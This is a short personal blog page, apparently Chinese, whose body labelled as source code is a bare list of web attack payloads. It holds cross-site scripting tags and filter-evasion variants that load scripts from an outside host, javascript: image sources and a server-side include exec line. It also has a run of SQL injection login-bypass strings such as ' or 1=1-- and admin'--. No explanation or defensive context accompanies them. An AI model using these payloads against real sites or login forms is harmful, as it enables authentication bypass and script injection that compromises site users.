山寨-IT民工 Eric's Blog 蓝色的海洋、自由的天空

源码：

 <SCRIPT>function a(){alert('XSS');}</SCRIPT>

<p>&lt;&quot;  <SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>  <img alt="" src="javascript:alert('XSS')" /><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->  <img alt="" src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" />  <SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>  <SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>  <SCRIPT a=">" '' SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>  <SCRIPT "a='>'" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>  <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC=&quot;http://xss.ha.ckers.org/a.js&quot;&gt;  link  admin'--  ' or 0=0 --  &quot; or 0=0 --  or 0=0 --  ' or 0=0 #  &quot; or 0=0 #  or 0=0 #  ' or 'x'='x  &quot; or &quot;x&quot;=&quot;x  ') or ('x'='x  ' or 1=1--  &quot; or 1=1--  or 1=1--  ' or a=a--  &quot; or &quot;a&quot;=&quot;a  ') or ('a'='a  &quot;) or (&quot;a&quot;=&quot;a  hi&quot; or &quot;a&quot;=&quot;a  hi&quot; or 1=1 --  hi' or 1=1 --  hi' or 'a'='a  hi') or ('a'='a  hi&quot;) or (&quot;a&quot;=&quot;a</p>